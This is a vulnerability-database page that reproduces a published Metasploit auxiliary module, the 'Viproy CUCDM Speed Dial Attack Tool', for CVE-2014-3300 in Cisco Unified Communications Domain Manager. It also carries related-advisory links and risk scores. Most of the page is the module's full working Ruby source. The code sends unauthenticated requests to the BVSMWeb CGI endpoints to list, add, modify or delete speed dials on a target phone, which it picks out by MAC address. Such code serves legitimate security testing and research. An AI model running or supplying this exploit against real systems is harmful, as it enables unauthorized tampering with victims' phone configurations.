Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Viproy CUCDM IP Phone XML Services Speed Dial Attack Tool

🗓️ 31 Aug 2024 00:00:00Reported by fozavci, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 160 Views

Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool. BVSMWeb portal in Cisco Communications Domain Manager before version 10 allows unauthorized speed dial entity manipulations by remote attackers

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2014-3300
29 May 201815:50
circl
CVE		CVE-2014-3300
7 Jul 201410:00
cve
Cvelist		CVE-2014-3300
7 Jul 201410:00
cvelist
Metasploit		Viproy CUCDM IP Phone XML Services - Call Forwarding Tool
10 Jan 201506:28
metasploit
Metasploit		Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool
10 Jan 201506:29
metasploit
NVD		CVE-2014-3300
7 Jul 201411:01
nvd
Packet Storm		Viproy CUCDM IP Phone XML Services Call Forwarding Tool
31 Aug 202400:00
packetstorm
Prion		Improper access control
7 Jul 201411:01
prion
securityvulns		Cisco Unified Communications Domain Manager multiple security vulnerabilities
4 Aug 201400:00
securityvulns
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'rexml/document'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',  
'Description' => %q{  
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager  
(CDM), before version 10, doesn't implement access control properly, which allows remote  
attackers to modify user information. This module exploits the vulnerability to make  
unauthorized speed dial entity manipulations.  
},  
'Author' => 'fozavci',  
'References' =>  
[  
['CVE', '2014-3300'],  
['BID', '68331']  
],  
'License' => MSF_LICENSE,  
'Actions' =>  
[  
[ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],  
[ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],  
[ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],  
[ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]  
],  
'DefaultAction' => 'List'  
))  
  
register_options(  
[  
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),  
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),  
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),  
OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),  
OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),  
])  
end  
  
def run  
  
case action.name.upcase  
when 'MODIFY'  
modify  
when 'DELETE'  
delete  
when 'ADD'  
add  
when 'LIST'  
list  
end  
  
end  
  
def send_rcv(uri, vars_get)  
uri = normalize_uri(target_uri.to_s, uri.to_s)  
res = send_request_cgi(  
{  
'uri' => uri,  
'method' => 'GET',  
'vars_get' => vars_get  
})  
  
if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/  
return Exploit::CheckCode::Vulnerable, res  
else  
print_error("Target appears not vulnerable!")  
return Exploit::CheckCode::Safe, res  
end  
end  
  
def parse(res)  
doc = REXML::Document.new(res.body)  
names = []  
phones = []  
  
list = doc.root.get_elements('DirectoryEntry')  
list.each do |lst|  
xlist = lst.get_elements('Name')  
xlist.each {|l| names << "#{l[0]}"}  
xlist = lst.get_elements('Telephone')  
xlist.each {|l| phones << "#{l[0]}" }  
end  
  
if names.size > 0  
names.size.times do |i|  
info = ''  
info << "Position: #{names[i].split(":")[0]}, "  
info << "Name: #{names[i].split(":")[1]}, "  
info << "Telephone: #{phones[i]}"  
  
print_good("#{info}")  
end  
else  
print_status("No Speed Dial detected")  
end  
end  
  
def list  
mac = datastore['MAC']  
  
print_status("Getting Speed Dials of the IP phone")  
vars_get = {  
'device' => "SEP#{mac}"  
}  
  
status, res = send_rcv('speeddials.cgi', vars_get)  
parse(res) unless status == Exploit::CheckCode::Safe  
end  
  
def add  
mac = datastore['MAC']  
name = datastore['NAME']  
position = datastore['POSITION']  
telno = datastore['TELNO']  
  
print_status("Adding Speed Dial to the IP phone")  
vars_get = {  
'name' => "#{name}",  
'telno' => "#{telno}",  
'device' => "SEP#{mac}",  
'entry' => "#{position}",  
'mac' => "#{mac}"  
}  
status, res = send_rcv('phonespeedialadd.cgi', vars_get)  
  
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/  
print_good("Speed Dial #{position} is added successfully")  
elsif res && res.body && res.body.to_s =~ /exist/  
print_error("Speed Dial is exist, change the position or choose modify!")  
else  
print_error("Speed Dial couldn't add!")  
end  
end  
  
def delete  
mac = datastore['MAC']  
position = datastore['POSITION']  
  
print_status("Deleting Speed Dial of the IP phone")  
  
vars_get = {  
'entry' => "#{position}",  
'device' => "SEP#{mac}"  
}  
  
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)  
  
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/  
print_good("Speed Dial #{position} is deleted successfully")  
else  
print_error("Speed Dial is not found!")  
end  
end  
  
def modify  
mac = datastore['MAC']  
name = datastore['NAME']  
position = datastore['POSITION']  
telno = datastore['TELNO']  
  
print_status("Deleting Speed Dial of the IP phone")  
  
vars_get = {  
'entry' => "#{position}",  
'device' => "SEP#{mac}"  
}  
  
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)  
  
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/  
print_good("Speed Dial #{position} is deleted successfully")  
print_status("Adding Speed Dial to the IP phone")  
  
vars_get = {  
'name' => "#{name}",  
'telno' => "#{telno}",  
'device' => "SEP#{mac}",  
'entry' => "#{position}",  
'mac' => "#{mac}"  
}  
  
status, res = send_rcv('phonespeedialadd.cgi', vars_get)  
  
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/  
print_good("Speed Dial #{position} is added successfully")  
elsif res && res.body =~ /exist/  
print_error("Speed Dial is exist, change the position or choose modify!")  
else  
print_error("Speed Dial couldn't add!")  
end  
else  
print_error("Speed Dial is not found!")  
end  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 27.5
EPSS0.45577
metasploithttpattack toolcisco unified communications domain manageraccess controlremote attackersspeed dialbvsmwebvulnerabilitymac addresstelephone numberauthorizationexploit code
160